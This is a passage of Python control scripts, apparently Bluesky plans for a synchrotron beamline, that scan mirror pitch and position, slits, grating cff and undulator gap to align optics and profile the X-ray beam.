#yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
#yield from mv(gvsc1,'open')
# uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_cff_optimization_centroid(num_scan):
x_motor= pgm.cff
y_motor= pgm.en
y_val= 1085
x_ideal= 2.20
x_start= x_ideal -0.1 #0.04#
x_stop= x_ideal +0.1 #0.04#
num= 11 #5 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
yield from mv(gvbt1,'open')
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
for i in range(num_scan):
uid = yield from count([rixscam],num=1)
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': pgm.cff = ' + str(x_val) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_exit_slit_optimization(extra_md = '' ):
x_motor= extslt.vg
y_motor= pgm.en
y_val= 850.7
x_ideal= 10
x_start= x_ideal +70
x_stop= x_ideal
num= 8 #12
yield from mv(gvbt1,'open')
f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 4)
yield from mv (x_motor,x_val)
yield from sleep(5)
yield from mv (y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' {}'. format(extra_md)})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': extslt.vg = ' + str(x_val) + '\n'#\
# ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
# uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
#if uid == None:
# uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': extslt.vg = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
yield from mv (x_motor,x_ideal)
print (f_string)
def rixscam_motor1_rel_scan(motor1, ideal, plus, minus, pts, extra_md = '' ):
x_motor= motor1
x_ideal= ideal
x_start= x_ideal + plus
x_stop= x_ideal - minus
num= pts #12
yield from mv(gvbt1,'open')
#f_string=''
yield from count([rixscam], md = {'reason':'dummy'})
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)#,y_motor,y_val)
uid = yield from count([rixscam],num=1, md = {'reason':' scan {} {}'. format(motor1.name, extra_md)})
if uid == None:
uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_val) + '\n'#\
# # ' , m7_pit = ' + str(y_val) + '\n'
yield from mv(gvsc1,'close')
uid = yield from count([rixscam],num=1, md = {'reason':'gv:sc1 dark'})
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dark \n'
yield from mv(x_motor,x_ideal)#,y_motor, y_ideal)
yield from mv(gvsc1,'open')
uid = yield from count([rixscam],num=1, md = {'reason':'returned to center'})
if uid == None:
uid = -1
#f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': dc_z = ' + str(x_ideal) + '\n'#\
# #' , m7_pit = ' + str(y_ideal) + '\n'
yield from mv(gvbt1,'close')
print (f_string)
def rixscam_m7_pit():
x_motor=espgm.m7_pit
x_start=5.6
x_stop=4.6
num=50
#yield from count([rixscam],num=1) #refresh CCD
for i in range(num):
x_val = round (x_start + i * (x_stop - x_start) / (num - 1) , 3)
yield from mv (x_motor,x_val)
uid = yield from count([rixscam],num=1)
if uid == None:
uid = -1
f_string += 'scan no ' + str(db[uid].start['scan_id']) + ': m7_pit = ' + str(x_val)
print (f_string)
yield from mv(gvbt1,'close')
def m1_check():
yield from mv(extslt.hg,20)
yield from rel_scan([qem07],m1.pit,-30,30,31, md = {'reason':'checking m1 before each cff'})
yield from mv(m1.pit,peaks.cen['gc_diag_grid'])
yield from mv(extslt.hg,150)
def post_3AAyag_align():
det=[sc_4]
x_axis=espgm.gr_pit
x_start=1
x_stop=5
x_num=21
y_axis=cryo.t
#y_start=64.33
y_start=65.09
y_stop=66.33
#y_num=51
y_num=32
for i in range(y_num):
y=y_start+i*(y_stop-y_start)/(y_num-1)
yield from mv(y_axis,y)
yield from scan(det,x_axis,x_start,x_stop,x_num)
#yield from mvr(x_axis, (x_start-x_stop)/(x_num-1)) # 2 lines added because scan is timing out
#yield from sleep(2.5) #
def lunch():
for i in range(1,5):
yield from mv(cryo.z,29+i)
yield from scan([qem11],pgm.en,850,860,51)
yield from mv(cryo.z,31)
for i in range(0,7):
yield from mv(cryo.y,34.5+i*0.5)
yield from scan([qem11],pgm.en,850,860,51)
yield from mv(cryo.y,36)
def m1_align():
m1x_init=1.05040
m1pit_init=1802
m1pit_start=1000
m1pit_step=250
for i in range(0,9):
yield from mv(m1.pit,m1pit_start+i*m1pit_step)
yield from scan([qem01,qem05],m1.x,-4,2,31)
yield from mv(m1.pit,m1pit_start)
def m1_align_fine():
m1x_init=0.28945 #0.46 #this is what I found, but this looks unused
m1pit_init=1934
m1pit_start=1800
m1pit_step=50
for i in range(0,7):
yield from mv(m1.x,0)
yield from mv(m1.pit,m1pit_start+i*m1pit_step)
yield from rel_scan([qem05],m1.x,-3.5,3.5,36)
yield from mv(m1.pit,m1pit_start)
#def m1_align_fine2(): ## MOVED to STANDAR-PLANS in STartup
# m1x_init=m1.x.user_readback.value
# m1pit_init=m1.pit.user_readback.value
# m1pit_step=50
# m1pit_start=m1pit_init-3*m1pit_step
# for i in range(0,7):
# yield from mv(m1.pit,m1pit_start+i*m1pit_step)
# yield from rel_scan([qem05],m1.x,-3.5,3.5,36)
# yield from mv(m1.pit,m1pit_start)
def find_energy():
pgm_m2_start=88.344903
pgm_gr_start=87.678349
yield from mv(pgm.m2_pit,pgm_m2_start)
yield from mv(pgm.gr_pit,pgm_gr_start)
yield from relative_inner_product_scan([qem07],451,pgm.m2_pit,-2,1.0,pgm.gr_pit,-2,1.0)
yield from sleep(60)
yield from mv(pgm.m2_pit,pgm_m2_start)
yield from mv(pgm.gr_pit,pgm_gr_start)
yield from scan([qem07],epu1.gap,20,55,141)
def m1m3_max():
temp_extslt_vg=extslt.vg.user_readback.value
temp_extslt_hg=extslt.hg.user_readback.value
yield from gcdiag.grid
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,20)
yield from relative_scan([qem07],m1.pit,-30,30,31)
yield from mv(m1.pit,peaks['cen']['gc_diag_grid'])
yield from sleep(10)
yield from relative_scan([qem07],m3.pit,-0.0005,0.0005,31)
yield from mv(m3.pit,peaks['cen']['gc_diag_grid'])
yield from mv(extslt.hg,temp_extslt_hg)
yield from mv(extslt.vg,temp_extslt_vg)
yield from gcdiag.out
def m3_tune():
#extslt_hg=0.12
#extslt_vg=0.1
m3_pit_start=-0.754240
m3_x_start=3.4
m3_pit_step=1
m3_x_step=1
for i in range(0,10):
yield from mv(m3.pit,m3_pit_start-m3_pit_step)
yield from sleep(10)
yield from mv(m3.pit,m3_pit_start)
yield from sleep(10)
yield from relative_scan([qem07],extslt.hc,-1,1,201)
for i in range(0,10):
yield from mv(m3.x,m3_x_start-m3_x_step)
yield from sleep(10)
yield from mv(m3.x,m3_x_start)
yield from sleep(10)
yield from relative_scan([qem07],extslt.hc,-1,1,201)
for i in range(0,10):
yield from mv(m3.pit,m3_pit_start+m3_pit_step)
yield from sleep(10)
yield from mv(m3.pit,m3_pit_start)
yield from sleep(10)
yield from relative_scan([qem07],extslt.hc,-1,1,201)
for i in range(0,10):
yield from mv(m3.x,m3_x_start+m3_x_step)
yield from sleep(10)
yield from mv(m3.x,m3_x_start)
yield from sleep(10)
yield from relative_scan([qem07],extslt.hc,-1,1,201)
for i in range(0,50):
yield from sleep(600)
yield from relative_scan([qem07],extslt.hc,-1,1,201)
def m3_focus():
m3_pit_start=-0.754240
extslt_hc_start=-3.68615
for i in range(0,30):
yield from mv(m3.pit,m3_pit_start-0.00072*i)
yield from mv(extslt.hg,40)
yield from relative_scan([qem07],extslt.hc,-0.4,0.4,21)
yield from mv(extslt.hc,peaks['max']['gc_diag_diode'][0])
yield from sleep(5)
yield from mv(extslt.hg,6)
yield from relative_scan([qem07],extslt.hc,-0.12,0.12,41)
yield from mv(extslt.hc,peaks['cen']['gc_diag_diode']-0.2)
def m3_stability_focus():
m3_pit_start=-0.754240
extslt_hc_start=-3.71405
yield from mv(extslt.hg,10)
for i in range(0,30):
yield from relative_scan([qem07],extslt.hc,-0.4,0.4,81)
yield from mv(extslt.hc,peaks['cen']['gc_diag_diode'])
yield from sleep(900)
for i in range(0,30):
yield from mv(m3.pit,m3_pit_start-0.00072*i)
yield from mv(extslt.hg,40)
yield from relative_scan([qem07],extslt.hc,-0.4,0.4,21)
yield from mv(extslt.hc,peaks['max']['gc_diag_diode'][0])
yield from sleep(5)
yield from mv(extslt.hg,6)
yield from relative_scan([qem07],extslt.hc,-0.12,0.12,41)
yield from mv(extslt.hc,peaks['cen']['gc_diag_diode']-0.2)
def find_center_of_rot():
ow_start = 39.45
ow_step = 0.01
m4pit_start = -4.0435
m4pit_step = 0.005
for i in range(0,30):
yield from mv(m4.pit,m4pit_start-i*m4pit_step)
yield from sleep(10)
print('Current cycle number: {}' .format(i))
yield from scan([qem11],ow,ow_start-25*ow_step,ow_start+25*ow_step,51)
yield from sleep(10)
def center_of_rot():
yield from mv(epu1.gap,41.2)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.75)
for i in range(0,25):
yield from mv(m4.x,3.6+0.1*(i-12))
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.21,-4.15,121)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.x,3.6)
def center_of_rot_coordinated():
yield from mv(epu1.gap,41.2)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.5)
for i in range(0,6):
yield from mv(m4.x,3.6+0.1*(i+5))
yield from mv(extslt.hc,-5.03560+0.057*(i+5))
yield from mv(m3.pit,-0.753135+0.000204*(i+5))
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.220,-4.20,41)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.x,3.6)
yield from mv(m3.pit,-0.753135)
yield from mv(extslt.hc,-5.03560)
def center_of_rot_yaw():
yield from mv(epu1.gap,41.00)
yield from mv(pgm.en,930)
#yield from mv(cryo.y,100)
#yield from mv(cryo.x,50)
#yield from mv(ow,39.75)
yield from mv(m4.x,1.2)
for i in range(0,10):
yield from mv(m4.yaw,-1.48-0.01*i)
yield from sleep(10)
yield from scan([qem10,qem11],m4.pit,-4.21,-4.15,121)
#yield from scan([qem10,qem11],m4.pit,-4.145,-4.115,61)
yield from sleep(30)
yield from mv(m4.yaw,-1.1850)
def epu_calib_left():
yield from mv(epu1.phase, 28.5)
d = [qem07]
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
yield from sleep(100)
#3rd Harmonic
for i in range(1400,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
def m4_yaw_roll():
#cryo.x.settle_time=0.2
#cryo.y.settle_time=0.2
#r_md = 'V beam with yaw roll'
#yield from mv(extslt.vg,30)
#yield from mv(extslt.hg,150)
#yield from mv(epu1.gap,40.8) #detunedyield from mv(cryo.x,33.50)
# mir4_rol_init = 1.421
# mir4_rol_step= 0.002
mir4_yaw_init = -0.7064
mir4_yaw_step = 0.0003 #0.002
for i in range(-5,6):
yield from mv(m4.yaw, mir4_yaw_init + mir4_yaw_step * (1 * i))
#yield from mv(m4.rol,mir4_rol_init+mir4_rol_step*(1*i))
#yield from mv(cryo.x,39.0)
yield from mv(cryo.y,90.010) # to be adjusted
yield from sleep(5)
yield from rel_scan([sclr],cryo.y,0,0.03,91)
#yield from rel_scan([sclr],cryo.y,0,0.04,121, md={'reason':r_md})
def pitch_and_yaw():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
#yield from mv(extslt.hg,150)
mir4_pit_init = -4.1027
mir4_pit_step = -0.0003
for i in range(0,6):
yield from mv(m4.pit, mir4_pit_init + mir4_pit_step * (1 * i))
yield from m4_yaw_roll()
def m4_y():
yield from mv(extslt.vg,20)
yield from mv(extslt.hg,300)
yield from mv(epu1.gap,40.8) #detunedyield from mv(cryo.x,33.50)
mir4_y_init = 96.875
mir4_y_step= 0.05
for i in range(1, 7):
yield from mv(m4.y,mir4_y_init+mir4_y_step*(1*i-3))
yield from mv(cryo.x,39.3)
yield from mv(cryo.y,94.47)
yield from sleep(10)
yield from relative_scan([sclr],cryo.y,0,0.15,31)
def m4_pit():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
#yield from mv(extslt.vg,30)
yield from mv(extslt.hg,150)
#yield from mv(epu1.gap,40.8) #detuned EPU @930 eV
mir4_pit_init = -4.1024
mir4_pit_step= 0.0003 #0.001
for i in range(-7, 8):
yield from mv(m4.pit,mir4_pit_init+1*mir4_pit_step*(1*i))
#yield from mv(cryo.x,37.8)
yield from mv(cryo.y,90.152) # to be adjusted
yield from sleep(10)
yield from relative_scan([sclr],cryo.y,0,0.02,41)
#yield from relative_scan([sclr],cryo.y,0,0.10,31)
#yield from mv(cryo.y,97.5)
#yield from mv(cryo.x,43.350+0.08*(1*i))
#yield from mv(cryo.x,42.7) # to be adjusted
#yield from sleep(30)
#yield from relative_scan(d11,cryo.x,0,0.4,121)
def m4_z():
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,150)
#yield from mv(epu1.gap,40.8) #detuned EPU @930 eV
mir4_z_init = -5.4
mir4_z_step= 0.1
for i in range(0, 15):
yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-7))
yield from mv(cryo.x,40)
yield from mv(cryo.y,94.44-0.01*(i-7))
yield from sleep(10)
yield from relative_scan([sclr],cryo.y,0,0.1,31)
#yield from mv(cryo.y,98.0)
#yield from mv(cryo.x,42.7-(1*i-5)*0.028)
#yield from mv(cryo.x,42.7)
#yield from sleep(30)
#yield from relative_scan(d11,cryo.x,0,0.4,121)
def m4_z_pit():
start_scan_id=None
total_num_scans=110
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
d11 = [qem11]
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,300)
#yield from mv(epu1.gap,38) #detuned EPU @852 eV
mir4_z_init = -1.4
mir4_z_step= 0.5
mir4_pit_init = -4.085
mir4_pit_step= 0.003
for i in range(0, 5):
yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-2))
yield from sleep(30)
for i in range(0, 11):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*i-5))
yield from sleep(30)
yield from mv(cryo.y,97)
yield from mv(cryo.x,43.05+0.1*(1*i-5)) # to be adjusted
yield from sleep(30)
uid = yield from relative_scan(d11,cryo.x,0,0.5,101)
if uid is not None and start_scan_id is None:
start_scan_id = db[uid].start['scan_id']
if start_scan_id is not None: current_plan_time(start_scan_id,total_num_scans)
yield from mv(cryo.x,42)
yield from mv(cryo.y,97.6) # to be adjusted
yield from sleep(30)
yield from relative_scan(d11,cryo.y,0,0.4,121)
if start_scan_id is not None: current_plan_time(start_scan_id,total_num_scans)
def m4_z_pit_2():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
d11 = [qem11]
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,300)
#yield from mv(epu1.gap,38) #detuned EPU @852 eV
mir4_z_init = -5.4
mir4_z_step= 0.5
mir4_pit_init = -4.061
mir4_pit_step= 0.003
#for i in range(0, 5):
#yield from mv(m4.z,mir4_z_init+mir4_z_step*(1*i-2))
#yield from sleep(30)
for i in range(0, 7):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*i-3))
yield from sleep(5)
yield from mv(cryo.y,96.28) # to be adjusted
yield from sleep(10)
yield from relative_scan(d11,cryo.y,0,0.2,61)
def m4_x():
d11 = [qem11]
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,3000)
yield from mv(epu1.gap,40.7) #detunedyield from mv(cryo.x,33.50)
mir4_x_init = 3.2
extslt_hc_init = -4.106
mir3_pit_init = -0.751240
mir4_x_step= 0.1
mir3_pit_step=0.0002164 # +5.55% correction with respect to theoretical 0.00205
extslt_hc_step=0.05715
for i in range(0, 11):
yield from mv(m4.x,mir4_x_init+mir4_x_step*(1*i-5))
yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-5))
yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-5))
yield from sleep(30)
yield from mv(cryo.x,36)
yield from mv(cryo.y,98.6)
yield from sleep(30)
yield from scan(d11,cryo.y,98.5,98.8,91)
yield from mv(cryo.y,98.0)
yield from mv(cryo.x,+(1*i-5)*0.1)
yield from sleep(30)
yield from scan(d11,cryo.x,37.5+(1*i-5)*0.1,37.8+(1*i-5)*0.1,91)
def m4_vexitslt_focus():
#d11=[qem11]
d11=[sclr]
extslt_ini=5
extslt_final=42.5
extslt_step=2.5
for i in range(0, 1+round(abs(extslt_ini-extslt_final)/extslt_step)):
yield from mv(extslt.vg,extslt_ini+i*extslt_step)
#yield from sleep(5)
#yield from mv(cryo.x,40.6)
yield from mv(cryo.y,67.065) # to be adjusted
yield from sleep(1)
yield from relative_scan([sclr],cryo.y,0,0.015,46)
#yield from mv(cryo.y,98)
#yield from mv(cryo.x,43.2) # to be adjusted
#yield from sleep(30)
#yield from relative_scan(d11,cryo.x,0,0.4,151)
def m4_depth_of_focus():
cryo.x.settle_time=0.2
cryo.y.settle_time=0.2
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,150)
cryo_z_init = 0.1#-0.8
cryo_z_step= 0.15
v_focus_x = 37.65
v_focus_y = 89.950
for i in range(-6, 21): #-15, 16
yield from mv(cryo.z,cryo_z_init + cryo_z_step * (1 * i))
yield from mv(cryo.x, v_focus_x)
yield from mv(cryo.y, v_focus_y)
yield from sleep(5)
print('\n\n\t\tMoved cryo.z for i = {}\n\n'.format(i))
yield from rel_scan([sclr],cryo.y,0,0.035,106)
yield from mv(cryo.z,cryo_z_init)
cryo_x_init = 38.45
yield from mv(cryo.y,88.9550)
x_offset = -0.014
c = 0
#yield from mv(cryo.x,38.42)
for i in range(-6, 21): #-15, 16
c = c + 1
yield from mv(cryo.z, cryo_z_init + cryo_z_step * (1 * i))
yield from mv(cryo.x, cryo_x_init + c * x_offset)
#yield from mv(cryo.x,cryo_x_init)
yield from sleep(5)
print('\n\n\t\tMoved cryo.z for i = {}\n\n'.format(i))
yield from rel_scan([sclr],cryo.x,0,0.2,201)
def m4_cryo_x_vfocus():
d11=[qem11]
cryo_x_ini=34
cryo_x_final=38
cryo_x_step=0.25
for i in range(0, 1+round(abs(cryo_x_ini-cryo_x_final)/cryo_x_step)):
yield from mv(cryo.x,cryo_x_ini+i*cryo_x_step)
yield from sleep(10)
yield from mv(cryo.y,95.91) # to be adjusted
yield from rel_scan([qem11],cryo.y,-2,0.2,23)
yield from mv(cryo.y,peaks['cen']['sc_diode_1'])
yield from sleep(10)
yield from relative_scan(d11,cryo.y,-0.15,0.15,91)
def m4_m3_x():
d11 = [qem11]
yield from mv(extslt.vg,30)
yield from mv(extslt.hg,3000)
yield from mv(epu1.gap,38) #detunedyield from mv(cryo.x,33.50)
mir4_x_init = 3.2
extslt_hc_init = -4.106
mir3_pit_init = -0.747875
mir1_pit_init = 1932.537
mir3_x_init=1.2
mir3_x_step= 0.5
mir3_pit_step=-0.00108 # +5.55% correction with respect to theoretical 0.00101
extslt_hc_step=0.2857
mir1_pit_step=4.52
for i in range(0, 11):
yield from mv(m1.pit,mir1_pit_init+mir1_pit_step*(1*i-5))
yield from sleep(30)
yield from mv(m3.x,mir3_x_init+mir3_x_step*(1*i-5))
yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-5))
yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-5))
mir4_pit_init = -4.069
mir4_pit_step= 0.003
for j in range(0, 5):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*j-2))
yield from sleep(30)
yield from mv(cryo.x,42)
yield from mv(cryo.y,97.55)
yield from sleep(30)
yield from rel_scan(d11,cryo.y,0,0.4,121)
yield from mv(cryo.y,97.0)
yield from mv(cryo.x,37.4+0.1*(1*j-2)+0.038*(1*i-6))
yield from sleep(30)
yield from rel_scan(d11,cryo.x,0,0.5,121)
def m4_extslt_scan():
d11 = [qem11]
yield from mv(cryo.x,32.7)
yield from mv(cryo.z,5.5)
for i in range(0, 9):
yield from mv(cryo.y,98)
yield from mv(epu1.gap,40.9-i*0.0055*5)
yield from sleep(10)
yield from mv(extslt.vg,5+i*5)
yield from sleep(10)
yield from scan(d11,cryo.y,98,98.5,150)
for i in range(0, 6):
yield from mv(cryo.y,98)
yield from mv(epu1.gap,40.64-i*0.00535*10)
yield from sleep(10)
yield from mv(extslt.vg,50+i*10)
yield from sleep(10)
yield from scan(d11,cryo.y,98,98.5,150)
def beam_profile():
d11 = [qem11]
yield from mv(cryo.y,97.2)
for i in range(0, 21):
yield from mv(cryo.x,36.7-0.07*i)
yield from sleep(10)
yield from mv(cryo.z,0.5+i)
yield from sleep(10)
yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
#yield from mv(cryo.y,97.6)
#for i in range(0, 21):
#yield from mv(cryo.x,36.7-0.07*i)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
#yield from mv(cryo.x,33.5)
#for i in range(0, 21):
#yield from mv(cryo.y,97.85)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.y,97.85,98.65,267)
#yield from mv(cryo.y,98)
#for i in range(0, 21):
#yield from mv(cryo.x,36.7-0.07*i)
#yield from sleep(10)
#yield from mv(cryo.z,0.5+i)
#yield from sleep(10)
#yield from scan(d11,cryo.x,36.7-0.07*i,37.7-0.07*i,300)
def beam_profile_vs_cryox():
d11 = [qem11]
yield from mv(cryo.x,30)
yield from mv(cryo.z,5.5)
yield from mv(epu1.gap,40.9)
for i in range(0, 61):
yield from mv(cryo.y,98)
yield from sleep(10)
yield from mv(cryo.x,30+i*0.1)
yield from sleep(30)
yield from scan(d11,cryo.y,98,98.5,200)
yield from mv(extslt.vg,30)
yield from mv(epu1.gap,40.75)
for i in range(0, 61):
yield from mv(cryo.y,98)
yield from sleep(10)
yield from mv(cryo.x,30+i*0.1)
yield from sleep(30)
yield from scan(d11,cryo.y,98,98.5,200)
def beam_profile_at_cor():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
yield from gcd_out()
d11 = [qem11]
mir4_pit_init = -4.1709
mir4_x_init = 2.675
mir4_y_init = 98.44
mir3_pit_init=-0.743510
extslt_hc_init=-5.22910
mir4_x_step= 1
mir4_pit_step=-0.0266 #-0.0307/4
mir3_pit_step=0.002164 # +5.55% correction with respect to theoretical 0.00205
extslt_hc_step=0.57
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,200)
yield from mv(epu1.gap,40.7) #detuned
for i in range(0, 25):
yield from mv(m4.pit,mir4_pit_init+mir4_pit_step*(1*i-12))
yield from mv(m4.x,mir4_x_init+mir4_x_step*(1*i-12))
yield from mv(extslt.hc,extslt_hc_init+extslt_hc_step*(1*i-12))
yield from mv(m3.pit,mir3_pit_init+mir3_pit_step*(1*i-12))
yield from sleep(30)
yield from mv(cryo.x,29.2)
yield from mv(cryo.y,99.3)
yield from sleep(30)
yield from scan(d11,cryo.y,99.3,100.1,161)
yield from mv(cryo.y,98.4)
yield from mv(cryo.x,32.4)
yield from sleep(30)
yield from scan(d11,cryo.x,32.4,33.4,201)
def beam_profile_vs_m3x():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
from epics import caget, caput
yield from gcd_out()
d11 = [qem11]
mir1_pit_init=1857.5
mir3_pit_init= -0.75975
mir3_x_init = 1.8
mir4_pit_init = -4.11070
mir4_x_init = 0.3
mir4_y_init = 98.95
extslt_hc_init= -6.8892
step_m3x= 1.4/4
step_m3pit= -0.00155/4 #-0.0028647/8
step_m4pit= -0.0028647/4
step_extslt_hc= 0.5998/4
step_m1pit= 25.33/4
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,200)
yield from mv(epu1.gap,40.7) #detuned
for i in range(1, 7):
caput('XF:02IDA-OP{Mir:1-Ax:4_Pitch}Cmd:Kill-Cmd',1 )
yield from abs_set(m1.pit,mir1_pit_init+step_m1pit*(1*i+8),wait=False)
yield from sleep(30)
caput('XF:02IDA-OP{Mir:1-Ax:4_Pitch}Cmd:Kill-Cmd',1 )
yield from mv(m4.pit,mir4_pit_init+step_m4pit*(1*i+8))
yield from mv(m3.x,mir3_x_init+step_m3x*(1*i+8))
yield from mv(m3.pit,mir3_pit_init+step_m3pit*(1*i+8))
yield from mv(extslt.hc,extslt_hc_init+step_extslt_hc*(1*i+8))
yield from mv(cryo.x,29.2)
yield from mv(cryo.y,100.00)
yield from sleep(30)
yield from scan(d11,cryo.y,100.00,100.70,141)
yield from mv(cryo.y,99.0)
yield from mv(cryo.x,32.35)
yield from sleep(30)
yield from scan(d11,cryo.x,32.35,33.35,201)
def beam_profile_vs_m4_surface():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
d11 = [qem10,qem11]
m4slt_inb_init=10.5
m4slt_out_init=-1.95
step_x=0.1
yield from mv(extslt.vg,10)
yield from mv(epu1.gap,41.1) #tuned
for i in range(1, 24):
yield from mv(m4slt.inb,m4slt_inb_init+step_x*i)
yield from mv(m4slt.out,m4slt_out_init+step_x*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,99.0)
yield from sleep(30)
yield from scan(d11,cryo.y,99.0,99.5,151)
yield from mv(cryo.y,97.0)
yield from mv(cryo.x,21.3)
yield from sleep(30)
yield from scan(d11,cryo.x,21.3,23.3,401)
yield from mv(m4slt.inb,-18)
yield from mv(m4slt.out,18)
yield from sleep(30)
yield from mv(epu1.gap,40.7) #detuned
mir4_rol_init=2.093140 #m4_rol initial value 2.59314
step_r=0.1
for i in range(0, 11):
yield from mv(m4.rol,mir4_rol_init+step_r*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,97.9)
yield from sleep(10)
yield from scan(d11,cryo.y,97.9,99.9,401)
yield from mv(cryo.y,97.0)
yield from mv(cryo.x,21.3)
yield from sleep(10)
yield from scan(d11,cryo.x,21.3,23.3,401)
def beam_position_vs_m4_height_v():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
dets = [sclr]
m4slt_bot_init= -2.0
step_x = 0.2
yield from mv(m4slt.vg,0.25)
for i in range(0, 19):
yield from mv(m4slt.vc,m4slt_bot_init+step_x*i)
yield from sleep(10)
yield from scan(dets,cryo.y,90,90.1,301)
def beam_profile_vs_m4_surface_v():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
d11 = [qem10,qem11]
m4slt_bot_init= 4.7250
m4slt_top_init=-8.9750
step_x=0.08
yield from mv(extslt.vg,10)
yield from mv(epu1.gap,41.1) #tuned
for i in range(5, 11):
yield from mv(m4slt.bot,m4slt_bot_init+step_x*i)
yield from mv(m4slt.top,m4slt_top_init+step_x*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,97.90)
yield from sleep(30)
yield from scan(d11,cryo.y,97.9,99.9,401)
def FEscan_gap_new():
d = [qem07]
yield from mv(feslt.hc,0)
yield from mv(feslt.vc,0)
yield from mv(epu1.gap,41.3)
# Check Vertical Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.vg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Check Horizontal Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.hg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Repeat FE Slit Center Search
yield from mv(feslt.hg,0.8)
yield from mv(feslt.vg,0.8)
yield from mv(epu1.gap,41.3)
for i in range(0, 9):
